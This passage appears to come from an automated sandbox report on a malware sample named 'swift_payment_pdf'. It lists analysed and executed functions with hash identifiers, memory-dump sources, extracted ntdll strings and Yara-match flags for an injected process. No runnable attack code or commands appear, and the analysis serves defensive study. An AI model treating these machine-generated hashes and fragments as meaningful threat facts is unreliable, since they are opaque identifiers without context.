                  • Opcode ID: 37323e035c8540c45f8c80d57a1532f4d4fa0f734d48bca24b5c620510c12784
                  • Instruction ID: d06669a847053416653201f7e752f8fe92601e1a3c42534a3956f1afe6b05b4b
                  • Opcode Fuzzy Hash: 37323e035c8540c45f8c80d57a1532f4d4fa0f734d48bca24b5c620510c12784
                  • Instruction Fuzzy Hash: 75900265711C0042E20075AC4C28B070005D7D0307F95C155A0154554CC91589655621
                  Function 01392E30 Relevance: .0, Instructions: 4COMMON
                  Download Yara Rule
                  Memory Dump Source
                  • Source File: 00000005.00000002.2253655752.0000000001320000.00000040.00001000.00020000.00000000.sdmp, Offset: 01320000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_5_2_1320000_swift_payment_pdf.jbxd
                  Similarity
                  • API ID:
                  • String ID:
                  • API String ID:
                  • Opcode ID: 31f22d579c4a7e07ba033acacf1f059f4a9bb9991cfddd3833420403108eefe3
                  • Instruction ID: 29915110bda7f434b786002cd656e237a76372c06051634f16ffdd3d4fd7e4d6
                  • Opcode Fuzzy Hash: 31f22d579c4a7e07ba033acacf1f059f4a9bb9991cfddd3833420403108eefe3
                  • Instruction Fuzzy Hash: 7F90026570140402E102719C44286060009D7D134AFD5C052E1424555DC6258A57A232
                  Function 01392EA0 Relevance: .0, Instructions: 4COMMON
                  Download Yara Rule
                  Memory Dump Source
                  • Source File: 00000005.00000002.2253655752.0000000001320000.00000040.00001000.00020000.00000000.sdmp, Offset: 01320000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_5_2_1320000_swift_payment_pdf.jbxd
                  Similarity
                  • API ID:
                  • String ID:
                  • API String ID:
                  • Opcode ID: cb562d3b88690908e73c3b54bc678b7c5c00ac18d2f667dddfcf0b46137ba140
                  • Instruction ID: 21f2df315301fa64598472dd4384ac219f2aca6d730f82c64b98f17888c8ec1d
                  • Opcode Fuzzy Hash: cb562d3b88690908e73c3b54bc678b7c5c00ac18d2f667dddfcf0b46137ba140
                  • Instruction Fuzzy Hash: BC9002B570140402E140719C44187460005D7D0306F95C051A5064554EC6598ED96765
                  Function 01392E80 Relevance: .0, Instructions: 4COMMON
                  Download Yara Rule
                  Memory Dump Source
                  • Source File: 00000005.00000002.2253655752.0000000001320000.00000040.00001000.00020000.00000000.sdmp, Offset: 01320000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_5_2_1320000_swift_payment_pdf.jbxd
                  Similarity
                  • API ID:
                  • String ID:
                  • API String ID:
                  • Opcode ID: 09bf5c79cac5ba81a50b442baf773361e4e7c423f16d70e940354b2cbf02b52e
                  • Instruction ID: 35a817bb7aadc9b6f9c6a90f91aacee160f109e0192d18b8a766bc017b650fca
                  • Opcode Fuzzy Hash: 09bf5c79cac5ba81a50b442baf773361e4e7c423f16d70e940354b2cbf02b52e
                  • Instruction Fuzzy Hash: AD900265B0140502E101719C4418616000AD7D0246FD5C062A1024555ECA258A96A231
                  Function 01392EE0 Relevance: .0, Instructions: 4COMMON
                  Download Yara Rule
                  Memory Dump Source
                  • Source File: 00000005.00000002.2253655752.0000000001320000.00000040.00001000.00020000.00000000.sdmp, Offset: 01320000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_5_2_1320000_swift_payment_pdf.jbxd
                  Similarity
                  • API ID:
                  • String ID:
                  • API String ID:
                  • Opcode ID: 7ade756057c7e231d07e8ae7de395f6876d1b016368866b77a0b9c4221fb988c
                  • Instruction ID: 2e381ec8fdb1bae624cac0f12fd9483f2da637a1e7e07ddfd6d50e024bc79f91
                  • Opcode Fuzzy Hash: 7ade756057c7e231d07e8ae7de395f6876d1b016368866b77a0b9c4221fb988c
                  • Instruction Fuzzy Hash: D49002A570180403E140759C48186070005D7D0307F95C051A2064555ECA298D556235
                  Function 01393010 Relevance: .0, Instructions: 4COMMON
                  Download Yara Rule
                  Memory Dump Source
                  • Source File: 00000005.00000002.2253655752.0000000001320000.00000040.00001000.00020000.00000000.sdmp, Offset: 01320000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_5_2_1320000_swift_payment_pdf.jbxd
                  Similarity
                  • API ID:
                  • String ID:
                  • API String ID:
                  • Opcode ID: 94121b9987e693643ed3d28b2e457b4869ce5e0f93bc4abd2ff14be7f318355e
                  • Instruction ID: 374203d49fd6d0efd8d867955c442230e72caa28601ef512d4636e312f9bdade
                  • Opcode Fuzzy Hash: 94121b9987e693643ed3d28b2e457b4869ce5e0f93bc4abd2ff14be7f318355e
                  • Instruction Fuzzy Hash: EB90026570184442E140729C4818B0F4105D7E1207FD5C059A4156554CC91589595721
                  Function 01393090 Relevance: .0, Instructions: 4COMMON
                  Download Yara Rule
                  Memory Dump Source
                  • Source File: 00000005.00000002.2253655752.0000000001320000.00000040.00001000.00020000.00000000.sdmp, Offset: 01320000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_5_2_1320000_swift_payment_pdf.jbxd
                  Similarity
                  • API ID:
                  • String ID:
                  • API String ID:
                  • Opcode ID: 34e863650794e7e671e925c7964a30a6f6a456802e9d230c27c9fa430b0d26b5
                  • Instruction ID: e413c68b0a4ae352b96fbb47a129b465e8b5683a6958b30f504ae60e83f7d785
                  • Opcode Fuzzy Hash: 34e863650794e7e671e925c7964a30a6f6a456802e9d230c27c9fa430b0d26b5
                  • Instruction Fuzzy Hash: BF90026574140802E140719C84287070006D7D0606F95C051A0024554DC6168A6967B1
                  Function 013939B0 Relevance: .0, Instructions: 4COMMON
                  Download Yara Rule
                  Memory Dump Source
                  • Source File: 00000005.00000002.2253655752.0000000001320000.00000040.00001000.00020000.00000000.sdmp, Offset: 01320000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_5_2_1320000_swift_payment_pdf.jbxd
                  Similarity
                  • API ID:
                  • String ID:
                  • API String ID:
                  • Opcode ID: 654088180512ce92cc4e4de417b7046f35d10b537a0892d3dfbe57a9372a968f
                  • Instruction ID: 3c214509fe3ec6ae80b68cdf4292e1992810251f55680b1ae1874091dbe7e6c3
                  • Opcode Fuzzy Hash: 654088180512ce92cc4e4de417b7046f35d10b537a0892d3dfbe57a9372a968f
                  • Instruction Fuzzy Hash: 1C90026574545102E150719C44186164005F7E0206F95C061A0814594DC55589596321
                  Function 01393D10 Relevance: .0, Instructions: 4COMMON
                  Download Yara Rule
                  Memory Dump Source
                  • Source File: 00000005.00000002.2253655752.0000000001320000.00000040.00001000.00020000.00000000.sdmp, Offset: 01320000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_5_2_1320000_swift_payment_pdf.jbxd
                  Similarity
                  • API ID:
                  • String ID:
                  • API String ID:
                  • Opcode ID: c4a12f7a6609933d87d2d5d94d917864327b3df7284f985f37479ae9456c413e
                  • Instruction ID: ab650f89d223decfc0d14fabdb4605baf40e3eda08399c8c25e1e8cfcefacccf
                  • Opcode Fuzzy Hash: c4a12f7a6609933d87d2d5d94d917864327b3df7284f985f37479ae9456c413e
                  • Instruction Fuzzy Hash: 0390027570240142E540729C5818A4E4105D7E1307BD5D455A0015554CC91489655321
                  Function 01393D70 Relevance: .0, Instructions: 4COMMON
                  Download Yara Rule
                  Memory Dump Source
                  • Source File: 00000005.00000002.2253655752.0000000001320000.00000040.00001000.00020000.00000000.sdmp, Offset: 01320000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_5_2_1320000_swift_payment_pdf.jbxd
                  Similarity
                  • API ID:
                  • String ID:
                  • API String ID:
                  • Opcode ID: 77701b5151af8b9810045729c20cd1c6dd34ac62512fde447298cc1083283ef3
                  • Instruction ID: 8c5045ae56ae213ab015e4c21e0c4a5685e15d89a3e9deb3fa9b5b5ffbc0f094
                  • Opcode Fuzzy Hash: 77701b5151af8b9810045729c20cd1c6dd34ac62512fde447298cc1083283ef3
                  • Instruction Fuzzy Hash: 3490027970140402E510719C58186460046D7D0306F95D451A0424558DC65489A5A221
                  Function 01392C00 Relevance: .0, Instructions: 2COMMONLIBRARYCODE
                  Download Yara Rule
                  Memory Dump Source
                  • Source File: 00000005.00000002.2253655752.0000000001320000.00000040.00001000.00020000.00000000.sdmp, Offset: 01320000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_5_2_1320000_swift_payment_pdf.jbxd
                  Similarity
                  • API ID:
                  • String ID:
                  • API String ID:
                  • Opcode ID: a3d3d3c0123cddb368cc51eab9da9c3aaeeac76cd7bbfae310620ba6f7f49b43
                  • Instruction ID: a6d066aa7d5b28ad2df25e9cec57869bd68c93a4baa7b894d3225a3368ad5658
                  • Opcode Fuzzy Hash: a3d3d3c0123cddb368cc51eab9da9c3aaeeac76cd7bbfae310620ba6f7f49b43
                  • Instruction Fuzzy Hash:
                  Function 01392890 Relevance: 17.7, APIs: 6, Strings: 4, Instructions: 190COMMON
                  Download Yara Rule
                  APIs
                  Strings
                  Memory Dump Source
                  • Source File: 00000005.00000002.2253655752.0000000001320000.00000040.00001000.00020000.00000000.sdmp, Offset: 01320000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_5_2_1320000_swift_payment_pdf.jbxd
                  Similarity
                  • API ID: ___swprintf_l
                  • String ID: :%u.%u.%u.%u$::%hs%u.%u.%u.%u$::ffff:0:%u.%u.%u.%u$ffff:
                  • API String ID: 48624451-2108815105
                  • Opcode ID: 614dc0bfb93aa0b347b32f704f8c35ac257e8ad9d88fde1976a949fff0eed3b3
                  • Instruction ID: c164b3e90e664baf9efa8afa7e33de3550cf97230e246d936597df8aac0599bb
                  • Opcode Fuzzy Hash: 614dc0bfb93aa0b347b32f704f8c35ac257e8ad9d88fde1976a949fff0eed3b3
                  • Instruction Fuzzy Hash: 6451F7B6A0451ABFCF11DB9C888097FFBB8BB18248B50C129F4A5D7641E334EE1087E0
                  Function 01402410 Relevance: 17.7, APIs: 6, Strings: 4, Instructions: 189COMMON
                  Download Yara Rule
                  APIs
                  Strings
                  Memory Dump Source
                  • Source File: 00000005.00000002.2253655752.0000000001320000.00000040.00001000.00020000.00000000.sdmp, Offset: 01320000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_5_2_1320000_swift_payment_pdf.jbxd
                  Similarity
                  • API ID: ___swprintf_l
                  • String ID: :%u.%u.%u.%u$::%hs%u.%u.%u.%u$::ffff:0:%u.%u.%u.%u$ffff:
                  • API String ID: 48624451-2108815105
                  • Opcode ID: 4b0d616b84fa41d09e0c3677f7fd44f6cc3624208b08034616816408f549237f
                  • Instruction ID: 07870d4b69bb9f2da438649abf5535cad648d524ddbde6ccdb985888fa22b4ac
                  • Opcode Fuzzy Hash: 4b0d616b84fa41d09e0c3677f7fd44f6cc3624208b08034616816408f549237f
                  • Instruction Fuzzy Hash: 4951F471A00656ABDB22DE5EC994C7FBBF8EB44204B44847BE4D6D37D1E6B4EA008760
                  Function 01387630 Relevance: 14.2, APIs: 1, Strings: 7, Instructions: 194COMMON
                  Download Yara Rule
                  Strings
                  • Execute=1, xrefs: 013C4713
                  • CLIENT(ntdll): Found CheckAppHelp = %d for %wZ in ImageFileExecutionOptions, xrefs: 013C4655
                  • CLIENT(ntdll): Found ExecuteOptions = %ws for %wZ in application compatibility database, xrefs: 013C46FC
                  • CLIENT(ntdll): Processing %ws for patching section protection for %wZ, xrefs: 013C4742
                  • CLIENT(ntdll): Processing section info %ws..., xrefs: 013C4787
                  • CLIENT(ntdll): Found Execute=1, turning off execution protection for the process because of %wZ, xrefs: 013C4725
                  • ExecuteOptions, xrefs: 013C46A0
                  Memory Dump Source
                  • Source File: 00000005.00000002.2253655752.0000000001320000.00000040.00001000.00020000.00000000.sdmp, Offset: 01320000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_5_2_1320000_swift_payment_pdf.jbxd
                  Similarity
                  • API ID:
                  • String ID: CLIENT(ntdll): Found CheckAppHelp = %d for %wZ in ImageFileExecutionOptions$CLIENT(ntdll): Found Execute=1, turning off execution protection for the process because of %wZ$CLIENT(ntdll): Found ExecuteOptions = %ws for %wZ in application compatibility database$CLIENT(ntdll): Processing %ws for patching section protection for %wZ$CLIENT(ntdll): Processing section info %ws...$Execute=1$ExecuteOptions
                  • API String ID: 0-484625025
                  • Opcode ID: f07529de605c541f18efc3c852c2f32e310acf8306fb17c7455b192a829a9e73
                  • Instruction ID: 9835da84f7a9f607c2d03c9e8ac3943d1c4a16c4ffbbfedaaf52e294a5a373a8
                  • Opcode Fuzzy Hash: f07529de605c541f18efc3c852c2f32e310acf8306fb17c7455b192a829a9e73
                  • Instruction Fuzzy Hash: 125127356003096AEF20BBA8DC95FBA77A9AF5471CF1400A9E605A7290EB709E45CF50
                  Function 01426940 Relevance: 9.4, APIs: 6, Instructions: 416COMMON
                  Download Yara Rule
                  Memory Dump Source
                  • Source File: 00000005.00000002.2253655752.0000000001320000.00000040.00001000.00020000.00000000.sdmp, Offset: 01320000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_5_2_1320000_swift_payment_pdf.jbxd
                  Similarity
                  • API ID:
                  • String ID:
                  • API String ID:
                  • Opcode ID: d8848935565deeecae3b40dc4d36252ac36c0d5f22eb4f09df1253b8d6557a4c
                  • Instruction ID: 361cff617aeba6b67619cba71c5a471a91ffc69d715e0745d9a552dea0c3f9f8
                  • Opcode Fuzzy Hash: d8848935565deeecae3b40dc4d36252ac36c0d5f22eb4f09df1253b8d6557a4c
                  • Instruction Fuzzy Hash: 09025670508352AFD705CF19C490A6FBBE5EFD8704F81892EFA858B264DB71E985CB42
                  Function 0139B5EC Relevance: 9.0, APIs: 1, Strings: 4, Instructions: 238COMMON
                  Download Yara Rule
                  APIs
                  Strings
                  Memory Dump Source
                  • Source File: 00000005.00000002.2253655752.0000000001320000.00000040.00001000.00020000.00000000.sdmp, Offset: 01320000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_5_2_1320000_swift_payment_pdf.jbxd
                  Similarity
                  • API ID: __aulldvrm
                  • String ID: +$-$0$0
                  • API String ID: 1302938615-699404926
                  • Opcode ID: 67cbaaaa089a52c9565608c335445b38513441175a6f8a80d34fd58ab3f25221
                  • Instruction ID: 02f15e79515ceb51fdbb22f5ed44dd524b90f8e55534d37adf7c6024477003f6
                  • Opcode Fuzzy Hash: 67cbaaaa089a52c9565608c335445b38513441175a6f8a80d34fd58ab3f25221
                  • Instruction Fuzzy Hash: 3381D470E052499EEF25CE6CE891FFEFFB1AF45368F184219D851A7299C7349840CB91
                  Function 014020E0 Relevance: 8.8, APIs: 2, Strings: 3, Instructions: 84COMMON
                  Download Yara Rule
                  APIs
                  Strings
                  Memory Dump Source
                  • Source File: 00000005.00000002.2253655752.0000000001320000.00000040.00001000.00020000.00000000.sdmp, Offset: 01320000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_5_2_1320000_swift_payment_pdf.jbxd
                  Similarity
                  • API ID: ___swprintf_l
                  • String ID: %%%u$[$]:%u
                  • API String ID: 48624451-2819853543
                  • Opcode ID: 370fb44b8e579ceb677c9250087ed5ca1d6644324ebaab4a67716a18cf8f906b
                  • Instruction ID: 14311912f038fb75c5304432ac486590644f37c703222b08ef7f3a314f9ce6ea
                  • Opcode Fuzzy Hash: 370fb44b8e579ceb677c9250087ed5ca1d6644324ebaab4a67716a18cf8f906b
                  • Instruction Fuzzy Hash: B521517AA00119ABDB11DF7EC844EEFBBF8EF54644F440126E945E7284E770E9018BA1
                  Function 0137F5B0 Relevance: 7.4, APIs: 1, Strings: 3, Instructions: 382COMMON
                  Download Yara Rule
                  Strings
                  • RTL: Enter CriticalSection Timeout (%I64u secs) %d, xrefs: 013C02BD
                  • RTL: Re-Waiting, xrefs: 013C031E
                  • RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u, xrefs: 013C02E7
                  Memory Dump Source
                  • Source File: 00000005.00000002.2253655752.0000000001320000.00000040.00001000.00020000.00000000.sdmp, Offset: 01320000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_5_2_1320000_swift_payment_pdf.jbxd
                  Similarity
                  • API ID:
                  • String ID: RTL: Enter CriticalSection Timeout (%I64u secs) %d$RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u$RTL: Re-Waiting
                  • API String ID: 0-2474120054
                  • Opcode ID: 8e701be2e5952bef4c32a3215871c5848667e0fc01f0b3dda4527840f62e7814
                  • Instruction ID: b2b41c9d531f0598e04ccfd4606c7f78b98952e9665d232f78eaaec3cbd697b1
                  • Opcode Fuzzy Hash: 8e701be2e5952bef4c32a3215871c5848667e0fc01f0b3dda4527840f62e7814
                  • Instruction Fuzzy Hash: B5E1CE34604781DFE725CF2CC884B2ABBE9BB84728F140A1DF5A58B6E1D778D845CB42
                  Function 0138BED0 Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 129COMMON
                  Download Yara Rule
                  Strings
                  • RTL: Re-Waiting, xrefs: 013C7BAC
                  • RTL: Acquire Exclusive Sem Timeout %d (%I64u secs), xrefs: 013C7B7F
                  • RTL: Resource at %p, xrefs: 013C7B8E
                  Memory Dump Source
                  • Source File: 00000005.00000002.2253655752.0000000001320000.00000040.00001000.00020000.00000000.sdmp, Offset: 01320000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_5_2_1320000_swift_payment_pdf.jbxd
                  Similarity
                  • API ID:
                  • String ID: RTL: Acquire Exclusive Sem Timeout %d (%I64u secs)$RTL: Re-Waiting$RTL: Resource at %p
                  • API String ID: 0-871070163
                  • Opcode ID: abdbe22b9c065aef29638ac6744bc6bed9125c1afc3d0d51e67bb6bcc605dccc
                  • Instruction ID: e0ecd2604163cb0332a78b723ae71ed810b5c15bae7f25abebc27a9366e7efd8
                  • Opcode Fuzzy Hash: abdbe22b9c065aef29638ac6744bc6bed9125c1afc3d0d51e67bb6bcc605dccc
                  • Instruction Fuzzy Hash: 0141E1353007039FDB21EF29D840B6AB7E5EF98718F000A1DF95ADB680DB71E8098B91
                  Function 0138B4C0 Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 121COMMON
                  Download Yara Rule
                  APIs
                  • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 013C728C
                  Strings
                  • RTL: Re-Waiting, xrefs: 013C72C1
                  • RTL: Resource at %p, xrefs: 013C72A3
                  • RTL: Acquire Shared Sem Timeout %d(%I64u secs), xrefs: 013C7294
                  Memory Dump Source
                  • Source File: 00000005.00000002.2253655752.0000000001320000.00000040.00001000.00020000.00000000.sdmp, Offset: 01320000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_5_2_1320000_swift_payment_pdf.jbxd
                  Similarity
                  • API ID: Unothrow_t@std@@@__ehfuncinfo$??2@
                  • String ID: RTL: Acquire Shared Sem Timeout %d(%I64u secs)$RTL: Re-Waiting$RTL: Resource at %p
                  • API String ID: 885266447-605551621
                  • Opcode ID: deb77a2354578e3d5fc303242b3e2d8ad56ad1f563280d06c834e0ccce881144
                  • Instruction ID: d89f21c7ea50b30e9d3d88a68035c4559798781ffb03bc75266e8edac327d93a
                  • Opcode Fuzzy Hash: deb77a2354578e3d5fc303242b3e2d8ad56ad1f563280d06c834e0ccce881144
                  • Instruction Fuzzy Hash: 8941F235700707ABDB20DF29CC41B66B7A6FB94B18F14061DFD55AB640DB31E8028BD1
                  Function 01402300 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 90COMMON
                  Download Yara Rule
                  APIs
                  Strings
                  Memory Dump Source
                  • Source File: 00000005.00000002.2253655752.0000000001320000.00000040.00001000.00020000.00000000.sdmp, Offset: 01320000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_5_2_1320000_swift_payment_pdf.jbxd
                  Similarity
                  • API ID: ___swprintf_l
                  • String ID: %%%u$]:%u
                  • API String ID: 48624451-3050659472
                  • Opcode ID: 8bb1db3b8de74a6a604878c0a4cb241c354451397928c3e7c1d7ea9d66e8cdb1
                  • Instruction ID: 15c6f4a5f14cf09192b6a6d7bffb2ab9881f0b7e8d2b2b402fb6bf50e41c0503
                  • Opcode Fuzzy Hash: 8bb1db3b8de74a6a604878c0a4cb241c354451397928c3e7c1d7ea9d66e8cdb1
                  • Instruction Fuzzy Hash: C731A7726001299FDB61DF3DCC44FEFB7F8EB44614F444466E949E3280EB70AA448B60
                  Function 01397D61 Relevance: 5.5, APIs: 1, Strings: 2, Instructions: 284COMMON
                  Download Yara Rule
                  APIs
                  Strings
                  Memory Dump Source
                  • Source File: 00000005.00000002.2253655752.0000000001320000.00000040.00001000.00020000.00000000.sdmp, Offset: 01320000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_5_2_1320000_swift_payment_pdf.jbxd
                  Similarity
                  • API ID: __aulldvrm
                  • String ID: +$-
                  • API String ID: 1302938615-2137968064
                  • Opcode ID: 99ca5d320493ee8ecfac6479c2384e7848b43d072adb6e2058c73728248a7f31
                  • Instruction ID: 0e55a7290639afee77711aa383ce3d25e5106acc39c4f820bc8f162f84f5aa2e
                  • Opcode Fuzzy Hash: 99ca5d320493ee8ecfac6479c2384e7848b43d072adb6e2058c73728248a7f31
                  • Instruction Fuzzy Hash: 1191B471E2020A9BEF24DF6DC8816BEBBA5FF84728F14451AE956E72C0E73089458F11
                  Function 01359126 Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 199COMMON
                  Download Yara Rule
                  Strings
                  Memory Dump Source
                  • Source File: 00000005.00000002.2253655752.0000000001320000.00000040.00001000.00020000.00000000.sdmp, Offset: 01320000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_5_2_1320000_swift_payment_pdf.jbxd
                  Similarity
                  • API ID:
                  • String ID: $$@
                  • API String ID: 0-1194432280
                  • Opcode ID: cef30475f265ff242d76c68c05629e62894d89aa9ace95b26aba0f9d523beae0
                  • Instruction ID: 7f0e4cd687eeac809c9956c413070de4c856c6c8b2b4a2a387200c390fea2c65
                  • Opcode Fuzzy Hash: cef30475f265ff242d76c68c05629e62894d89aa9ace95b26aba0f9d523beae0
                  • Instruction Fuzzy Hash: 44812C71D00269DBDB35CB58CC44BEEB7B8AB48758F0141DAEA19B7640E7705E84CFA0

                  Executed Functions

                  Function 0492A844 Relevance: .1, Instructions: 111COMMON
                  Download Yara Rule
                  Memory Dump Source
                  • Source File: 00000006.00000002.3554626493.0000000004640000.00000040.00000001.00040000.00000000.sdmp, Offset: 04640000, based on PE: false
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_6_2_4640000_AbWHWpocGREf.jbxd
                  Yara matches
                  Similarity
                  • API ID:
                  • String ID:
                  • API String ID:
                  • Opcode ID: cac788ea9553f670f50948ea938ef9b83ed56016e9589fc95e0fbfc275b5478d
                  • Instruction ID: 2aec754f4d78d7bcd88bf795008b934b82ffdec0afbe25ec9e93761179dd67ec
                  • Opcode Fuzzy Hash: cac788ea9553f670f50948ea938ef9b83ed56016e9589fc95e0fbfc275b5478d
                  • Instruction Fuzzy Hash: D431A3526587F14ED30E836D08B9675AFC18F5720174EC2EEDADA5F2F3C0888409D3A5
                  Function 0492997A Relevance: 63.1, Strings: 50, Instructions: 622COMMON
                  Download Yara Rule
                  Strings
                  Memory Dump Source
                  • Source File: 00000006.00000002.3554626493.0000000004640000.00000040.00000001.00040000.00000000.sdmp, Offset: 04640000, based on PE: false
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_6_2_4640000_AbWHWpocGREf.jbxd
                  Yara matches
                  Similarity
                  • API ID:
                  • String ID: %U$($(#$*$*$*$,$,$/,$:-$=$A{$B5$F$I|$J$J.$Ko$N^n'$O+$P$RZ$US$US$U~$V$Y8$\.$\B$a$aj$c$d$f"$jg$m=$n'$nN$p$r$rm$sd$se$wp$z${P$~+$U$o$}
                  • API String ID: 0-1730764222
                  • Opcode ID: 6ca042b01c139293cd50f904abcb97d63b3b34f5a83c3d454ab97027b18e34da
                  • Instruction ID: e4138b1b892e9503f55cde8030b99e7e6e4319d0e9e0fdaadbceeb0fa1b17673
                  • Opcode Fuzzy Hash: 6ca042b01c139293cd50f904abcb97d63b3b34f5a83c3d454ab97027b18e34da
                  • Instruction Fuzzy Hash: 51829FB0905669CFEB24CF05CD98BDDBBB2BB85309F1085D9C0096B385D7796A89CF84
                  Function 04937629 Relevance: 6.4, Strings: 5, Instructions: 147COMMON
                  Download Yara Rule
                  Strings
                  Memory Dump Source
                  • Source File: 00000006.00000002.3554626493.0000000004640000.00000040.00000001.00040000.00000000.sdmp, Offset: 04640000, based on PE: false
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_6_2_4640000_AbWHWpocGREf.jbxd
                  Yara matches
                  Similarity
                  • API ID:
                  • String ID: 6$O$S$\$s
                  • API String ID: 0-3854637164
                  • Opcode ID: 3a85f5dd76d071124ef078b2674213952c9dc58d950a939c1c4ee78c62e7613f
                  • Instruction ID: 13427cadfd90bdb4272777ce9ab8811f687e8ff0b970fb9f75007d8a939adc6c
                  • Opcode Fuzzy Hash: 3a85f5dd76d071124ef078b2674213952c9dc58d950a939c1c4ee78c62e7613f
                  • Instruction Fuzzy Hash: CD4189B2901119BBDB10EBE4DD48EEBB3BCEBC5319F0085A5E90D97140E671BA548BD1
                  Function 04943EA9 Relevance: 1.3, Strings: 1, Instructions: 62COMMON
                  Download Yara Rule
                  Strings
                  Memory Dump Source
                  • Source File: 00000006.00000002.3554626493.0000000004640000.00000040.00000001.00040000.00000000.sdmp, Offset: 04640000, based on PE: false
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_6_2_4640000_AbWHWpocGREf.jbxd
                  Yara matches
                  Similarity
                  • API ID:
                  • String ID: *
                  • API String ID: 0-1466852979
                  • Opcode ID: 124912492b919fba64fae893d7071bc66b7a4005a345653cbbef20267b3b8a37
                  • Instruction ID: 40911870c072ab9659c9e0ab7f61d4ff4637346db242208aa0b2b1e88563fc0e
                  • Opcode Fuzzy Hash: 124912492b919fba64fae893d7071bc66b7a4005a345653cbbef20267b3b8a37
                  • Instruction Fuzzy Hash: A411ECB6D11218AF9B40DFE9D9409EEBBFCEF88210F14416AE919F7200E7705A448BA1
                  Function 049450D9 Relevance: 1.3, Strings: 1, Instructions: 60COMMON
                  Download Yara Rule
                  Strings
                  Memory Dump Source
                  • Source File: 00000006.00000002.3554626493.0000000004640000.00000040.00000001.00040000.00000000.sdmp, Offset: 04640000, based on PE: false
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_6_2_4640000_AbWHWpocGREf.jbxd
                  Yara matches
                  Similarity
                  • API ID:
                  • String ID: .O
                  • API String ID: 0-2898085842
                  • Opcode ID: 6a6e59324a088b1541a0c8981052ee54f7a345e73e67bde8c4c44e9b80115172
                  • Instruction ID: 3380eb7bb8ed3e741966a94dc7f8b38e29d590c87dbccc64d499c1a43ed26ee1
                  • Opcode Fuzzy Hash: 6a6e59324a088b1541a0c8981052ee54f7a345e73e67bde8c4c44e9b80115172
                  • Instruction Fuzzy Hash: 171100B6D0121DAF9B40DFE9DD409EEBBFCFF98214F04416AE915E3200E7705A058BA0
                  Function 0492358C Relevance: .1, Instructions: 136COMMON
                  Download Yara Rule
                  Memory Dump Source
                  • Source File: 00000006.00000002.3554626493.0000000004640000.00000040.00000001.00040000.00000000.sdmp, Offset: 04640000, based on PE: false
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_6_2_4640000_AbWHWpocGREf.jbxd
                  Yara matches
                  Similarity
                  • API ID:
                  • String ID:
                  • API String ID:
                  • Opcode ID: ea483fe6e7ba487e72449aaf4314c4e19db4786a744e564e6bcb2f72ac1963d2
                  • Instruction ID: ecadbb9396cf33c63d573947c9df16b338f8cd27e996bb2f0f24e6f80ef95aac
                  • Opcode Fuzzy Hash: ea483fe6e7ba487e72449aaf4314c4e19db4786a744e564e6bcb2f72ac1963d2
                  • Instruction Fuzzy Hash: B64130B1D11229AFDB14CF99C881EEEBBBCFF49710F10415AF908E6244D3B49641CBA0
                  Function 04947149 Relevance: .1, Instructions: 82COMMON
                  Download Yara Rule
                  Memory Dump Source
                  • Source File: 00000006.00000002.3554626493.0000000004640000.00000040.00000001.00040000.00000000.sdmp, Offset: 04640000, based on PE: false
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_6_2_4640000_AbWHWpocGREf.jbxd
                  Yara matches
                  Similarity
                  • API ID:
                  • String ID:
                  • API String ID:
                  • Opcode ID: 19848c0c6d74901e6cd8e25695a61db4e23cbb18463e7c5345a9c512cad6b175
                  • Instruction ID: 501a042f1ad3be8a6ebf39c569da42d302bb140e9d8ee0689090303291f6cde7
                  • Opcode Fuzzy Hash: 19848c0c6d74901e6cd8e25695a61db4e23cbb18463e7c5345a9c512cad6b175
                  • Instruction Fuzzy Hash: 9C21FCB5A00209AFDB14DF99DC41EAFB7B9EFC9714F10421AFD19A7240D770B9118BA1
                  Function 04937469 Relevance: .1, Instructions: 75COMMON
                  Download Yara Rule
                  Memory Dump Source
                  • Source File: 00000006.00000002.3554626493.0000000004640000.00000040.00000001.00040000.00000000.sdmp, Offset: 04640000, based on PE: false
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_6_2_4640000_AbWHWpocGREf.jbxd
                  Yara matches
                  Similarity
                  • API ID:
                  • String ID:
                  • API String ID:
                  • Opcode ID: 2f1f047b2e39129f1f86205465f6175a89641b909da98a8f732e2418bb9e1e1a
